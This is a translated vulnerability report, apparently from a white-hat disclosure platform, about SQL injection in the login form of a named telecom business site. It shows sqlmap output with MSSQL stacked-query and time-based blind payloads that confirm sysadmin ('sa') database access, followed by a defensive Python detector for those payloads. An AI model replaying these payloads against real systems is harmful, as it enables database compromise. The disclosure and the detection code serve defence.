2014-10-18: Details sent to the vendor, awaiting vendor handling
2014-10-23: Vendor has confirmed; details disclosed to the vendor only
2014-11-02: Details disclosed to core white hats and experts in the relevant field
2014-11-12: Details disclosed to regular white hats
2014-11-22: Details disclosed to intern white hats
2014-12-02: Details disclosed to the public
Taking a spare moment to earn a few points.
http://3gdr.yn.189.cn/ 3G Daren business management system: POST injection at the login handler; the UserName parameter is injectable.
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: UserName
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwULLTE2Mzc1MTQxNTUPZBYCAgMPZBYCAgUPFCsAAmQQFgAWABYAZGT/Hssv8/3NuZE4GPO76VAmRg69a5OXCF4DVfby33snrA==&__EVENTTARGET=ImageMap1&__EVENTARGUMENT=0&__EVENTVALIDATION=/wEWBgKR4fibCgKvruq2CAKyxeCRDwLA14awAgLf14awAgKdn+0nIZ54IPelK579RLcQVn0mXxnRRWyQmP51F0g6+Gmu+DU=&UserName=s'; WAITFOR DELAY '0:0:5'--&PassWord=a&CheckFlag=0

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwULLTE2Mzc1MTQxNTUPZBYCAgMPZBYCAgUPFCsAAmQQFgAWABYAZGT/Hssv8/3NuZE4GPO76VAmRg69a5OXCF4DVfby33snrA==&__EVENTTARGET=ImageMap1&__EVENTARGUMENT=0&__EVENTVALIDATION=/wEWBgKR4fibCgKvruq2CAKyxeCRDwLA14awAgLf14awAgKdn+0nIZ54IPelK579RLcQVn0mXxnRRWyQmP51F0g6+Gmu+DU=&UserName=s' WAITFOR DELAY '0:0:5'--&PassWord=a&CheckFlag=0
---
[11:48:53] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128
back-end DBMS: Microsoft SQL Server 2008
[11:48:53] [INFO] fetching current user
[11:48:53] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[11:49:11] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[11:49:21] [INFO] adjusting time delay to 1 second due to good response times
sa
current user: 'sa'
[11:49:28] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 31 times
[11:49:28] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\3gdr.yn.189.cn'
[*] shutting down at 11:49:28
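The two payloads sqlmap reports above are the MSSQL-specific signatures a defender can look for in decoded login POST bodies. The following is an added example (not part of the original report) that parses form-encoded bodies and flags the time-based blind and stacked-query patterns; the field names UserName/PassWord/CheckFlag come from the report, the sample bodies are constructed, and the signature names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample POST bodies shaped like the report's login form.
# Bodies 1 and 2 are the URL-encoded form of the two payloads sqlmap found;
# bodies 0 and 3 are benign (3 shows an apostrophe alone is not an alert).
SAMPLE_BODIES = [
    "UserName=alice&PassWord=hunter2&CheckFlag=0",
    "UserName=s%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--&PassWord=a&CheckFlag=0",
    "UserName=s%27+WAITFOR+DELAY+%270%3A0%3A5%27--&PassWord=a&CheckFlag=0",
    "UserName=o'brien&PassWord=x&CheckFlag=0",
]

# Signatures for the two techniques in the report: a WAITFOR DELAY time-based
# probe, a ';' after a closing quote that starts a stacked statement, and the
# '--' line comment that swallows the rest of the original query.
SIGNATURES = {
    "mssql_time_based": re.compile(r"\bWAITFOR\s+DELAY\b", re.IGNORECASE),
    "stacked_query": re.compile(r"'\s*;\s*[A-Z]+", re.IGNORECASE),
    "trailing_comment": re.compile(r"--\s*$"),
}

# Only these two count as an injection attempt on their own; the trailing
# comment is supporting evidence and is reported alongside them.
PRIMARY = {"mssql_time_based", "stacked_query"}


def parse_body(body: str) -> dict:
    """Split an application/x-www-form-urlencoded body into decoded fields."""
    fields = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        fields[unquote_plus(name)] = unquote_plus(value)
    return fields


def classify(body: str) -> dict:
    """Return {field: [matched signature names]} for fields that match a
    primary signature; fields with no primary hit are omitted."""
    hits = {}
    for name, value in parse_body(body).items():
        matched = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if PRIMARY.intersection(matched):
            hits[name] = matched
    return hits


def scan(bodies) -> list:
    """Return (index, hits) for every body that should raise an alert."""
    return [(i, classify(b)) for i, b in enumerate(bodies) if classify(b)]
```

In practice this is paired with the other signal visible in the sqlmap run: a burst of HTTP 500 responses from one login endpoint during a short window.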
Give it 12 points, please.
Severity: High
Vulnerability Rank: 11
Confirmed: 2014-10-23 08:40
None for now